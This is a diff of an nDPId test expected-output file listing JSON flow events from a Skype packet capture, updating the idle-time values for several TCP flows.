00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1208,14 +1208,14 @@ 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634728,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1238,8 +1238,8 @@ 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1254,8 +1254,8 @@ 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
